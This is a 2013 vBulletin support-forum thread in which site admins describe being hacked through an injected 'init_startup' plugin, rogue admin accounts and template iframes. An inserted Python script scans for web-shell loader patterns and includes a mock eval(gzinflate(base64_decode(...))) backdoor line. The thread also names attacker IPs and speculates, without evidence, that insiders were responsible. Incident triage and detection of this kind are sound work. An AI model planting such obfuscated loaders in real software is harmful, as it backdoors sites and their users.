Forum hacked...


  • Martyn_s30v
    replied
    I'd like to know what the common factor is here, everyone on vb 4.2.0? Install folder?



  • Martyn_s30v
    replied
    I got hacked this morning too. Running vb 4.2.0 exact same exploit by the looks of it. There were a couple of new admin accounts and subscriptions got locked into a plugin same as above...

    title - init_startup

    Deleting that plugin got my subscriptions page back. I did have the install directory, which has now been deleted.



  • rburns
    replied
    I have had the same problem, at 7.30 this morning.

    I managed to catch and delete most of it, but I have a different page on paid subscriptions now.

    The username was 30K and the IP was 178.73.207.151 and apparently came from Sweden!

    They added the plugin stated above, and added URLs to my templates (do a search for .biz or derpina in your templates). They used iframes.

    I've now found a script in my header at the bottom, I've now got rid of it.

    Best way I can advise to find all your issues is to go to
    http://quttera.com and put in a free check, it found everything on my site, and then all I needed to do was search the templates to get rid of it. If I find any more I will let you know here.

    VB, I am not happy that people are able to do this, I pay to have a site that is safe from these actions.

    Is there a way to make the system email you every time someone changes something in the Admin CP? Or changes certain things (plugins, users, forums). That way we will see this happening a lot faster and get in to stop it.
    Last edited by rburns; Tue 10th Sep '13, 1:29am.



  • LBmtb
    replied
    Major hackage here as well for the last two days. I *think* I've cleaned up the last of it. Similar symptoms... weird admin accounts, crazy plugins, redirects, code being inserted into templates and phrases.

    Is anybody else here annoyed that we paid decent money for this (relative to other forum solutions) and have had so many security headaches?



  • Zachery
    replied
    Please read the following two blog posts:
    http://www.vbulletin.com/forum/blogs...ve-been-hacked

    http://www.vbulletin.com/forum/blogs...vbulletin-site

    Also please see these recent security announcements:

    vBulletin 4.1.x-4.2.x & All versions of vBulletin 5: http://www.vbulletin.com/forum/forum...-1-vbulletin-5
    vBulletin 5.0.x patch released, for a different security issue: http://www.vbulletin.com/forum/forum...d-all-versions



  • Jaxo
    replied
    Found it !!!

    They added this plugin..

    title - init_startup
    Hook location - init_startup
    Plugin PHP code: [base64-encoded payload]
    exit;
    }
    Have just disabled it and all seems to be working !
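
The indicators reported in rburns's and Jaxo's posts (an encoded plugin on the init_startup hook; iframes, .biz and derpina strings in templates) can be checked mechanically over an export of the plugin and template tables. This is an added example, not code from the thread or from vBulletin; the row layout (title, hookname, phpcode, template), the helper names and the sample rows are assumptions constructed for illustration.

```python
import re

# Indicators named in the thread: encoded PHP inside a plugin, and
# iframes / ".biz" / "derpina" strings injected into templates.
PLUGIN_PATTERNS = {
    "decode-call": re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "eval-call": re.compile(r"\b(eval|assert|create_function)\s*\(", re.I),
    "long-encoded-string": re.compile(r"[A-Za-z0-9+/=]{120,}"),
}
TEMPLATE_PATTERNS = {
    "biz-string": re.compile(r"\.biz\b", re.I),
    "derpina": re.compile(r"derpina", re.I),
    "iframe": re.compile(r"<\s*iframe\b", re.I),
}

# Constructed sample rows (assumed export layout, not real forum data).
SAMPLE_PLUGINS = [
    {"title": "init_startup", "hookname": "init_startup",
     "phpcode": "eval(gzinflate(base64_decode('" + "QUJD" * 40 + "')));\nexit;"},
    {"title": "Forum stats cache", "hookname": "forumhome_start",
     "phpcode": "$stats = my_fetch_stats($vbulletin->options['bbtitle']);"},
]
SAMPLE_TEMPLATES = [
    {"title": "header", "template": '<div id="hd"></div>'
     '<iframe src="http://injected.biz.invalid/x" width="1" height="1"></iframe>'},
    {"title": "footer", "template": '<div id="footer">$copyright</div>'},
]

def scan(rows, patterns, field):
    """Return (row, sorted indicator names) for every row whose text matches."""
    flagged = []
    for row in rows:
        hits = sorted(name for name, rx in patterns.items() if rx.search(row[field]))
        if hits:
            flagged.append((row, hits))
    return flagged

def scan_plugins(rows):
    return [(r["title"], r["hookname"], h) for r, h in scan(rows, PLUGIN_PATTERNS, "phpcode")]

def scan_templates(rows):
    return [(r["title"], h) for r, h in scan(rows, TEMPLATE_PATTERNS, "template")]

if __name__ == "__main__":
    for title, hook, hits in scan_plugins(SAMPLE_PLUGINS):
        print(f"plugin {title!r} on hook {hook}: {', '.join(hits)}")
    for title, hits in scan_templates(SAMPLE_TEMPLATES):
        print(f"template {title!r}: {', '.join(hits)}")
```

A clean result only means these particular strings are absent; the thread also reports new admin accounts and possibly overwritten files, which need their own checks.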



  • Jaxo
    replied
    I have added this line to my config.php and now have access to the subscriptions section. So it has to be a plugin then? It's strange though that disabling all the plugins does not sort the problem.



  • Jaxo
    replied
    Ok, so I have disabled all my plugins and the problem persists. I have also overwritten all my files (was running 4.2.0 patch 2 and uploaded 4.2.1) but still have the problem. Any other suggestions?



  • Jamsoft
    replied
    Originally posted by Wayne Luke
    Has to be a plugin doing that. You would have to find the plugin and delete it.
    They may have also overwritten your subscription.php. You should not be challenged with a password, there. Check to see if the size of subscription.php is different from what comes in the installation. If so, you cannot trust your files and will need to re-upload. I've seen a TON of sites hit this way



  • Ion Saliu
    replied
    Originally posted by Ion Saliu
    That repeated IP in your post 37.130.224.22 shows this data:

    Country:
    Netherlands nl

    State/Region:
    Noord-Holland

    City:
    Amsterdam

    If it is NOT your location, then DELETE that IP immediately! I found yet another suspicious IP, this time located in Germany!

    I haven't had serious problems with this new hack-attack. I deleted the /install folder of my forum and deleted suspicious IPs. I also changed my login data, including in /includes/config.php. We can help one another if we make public suspicious IPs and also report them.

    But, then again, it struck me as well as other admins:

    WHAT IF THIS NEW HACK-ATTACK ORIGINATED IN THE VB HOUSE ITSELF (E.G. FORMER DISGRUNTLED EMPLOYEES)?
    One more IP to ban and thus be safer... the IP you posted, axiomaticule:
    37.130.224.22
    629334038
    2582e016.rdns.100tb.com
    Hosting Services
    Hosting Services
    Network sharing device or proxy server
    Recently reported forum spam source. (2)

    Country:
    Netherlands nl

    State/Region:
    Noord-Holland

    City:
    Amsterdam



  • Jaxo
    replied
    That didn't work very well... here is the link

    http://www.ip-adress.com/ip_tracer/37.130.224.22



  • Jaxo
    replied
    Originally posted by Ion Saliu
    That repeated IP in your post 37.130.224.22 shows this data:

    Country:
    Netherlands nl

    State/Region:
    Noord-Holland

    City:
    Amsterdam

    If it is NOT your location, then DELETE that IP immediately! I found yet another suspicious IP, this time located in Germany!

    I haven't had serious problems with this new hack-attack. I deleted the /install folder of my forum and deleted suspicious IPs. I also changed my login data, including in /includes/config.php. We can help one another if we make public suspicious IPs and also report them.

    But, then again, it struck me as well as other admins:

    WHAT IF THIS NEW HACK-ATTACK ORIGINATED IN THE VB HOUSE ITSELF (E.G. FORMER DISGRUNTLED EMPLOYEES)?

    Have had a bit of a search myself and came up with the same result.. it's originating in the Netherlands.
    37.130.224.22 - IP Tracing and IP Tracking

    Click for big IP address location image. It is 8:44 PM UTC when you ran this IP tracer report for 37.130.224.22 here on our website, IP-Adress.com. When it comes to 37.130.224.22, you can trust that if we have all the IP trace information possible for it, then we will display it further below to assist in your research of this IP address if available. Feel free to run another IP trace for 37.130.224.22 or a different search.
    Timestamp Confirmation:
    The IP tracer report for 37.130.224.22 was ran at 8:44 PM UTC on September 9, 2013 and the information is provided below if available.


    Think I best have a look and see if it matches any members :?



  • Wayne Luke
    replied
    Has to be a plugin doing that. You would have to find the plugin and delete it.



  • Jaxo
    replied
    Originally posted by Wayne Luke

    I am not sure what you mean. There are no passwords on paid subscriptions.

    When I go to paid subscription in my admin panel no matter what tab I click it asks for a password... Looking at the logs this seems to be something they were tampering with?



  • Ion Saliu
    replied
    That repeated IP in your post 37.130.224.22 shows this data:

    Country:
    Netherlands nl

    State/Region:
    Noord-Holland

    City:
    Amsterdam

    If it is NOT your location, then DELETE that IP immediately! I found yet another suspicious IP, this time located in Germany!

    I haven't had serious problems with this new hack-attack. I deleted the /install folder of my forum and deleted suspicious IPs. I also changed my login data, including in /includes/config.php. We can help one another if we make public suspicious IPs and also report them.

    But, then again, it struck me as well as other admins:

    WHAT IF THIS NEW HACK-ATTACK ORIGINATED IN THE VB HOUSE ITSELF (E.G. FORMER DISGRUNTLED EMPLOYEES)?
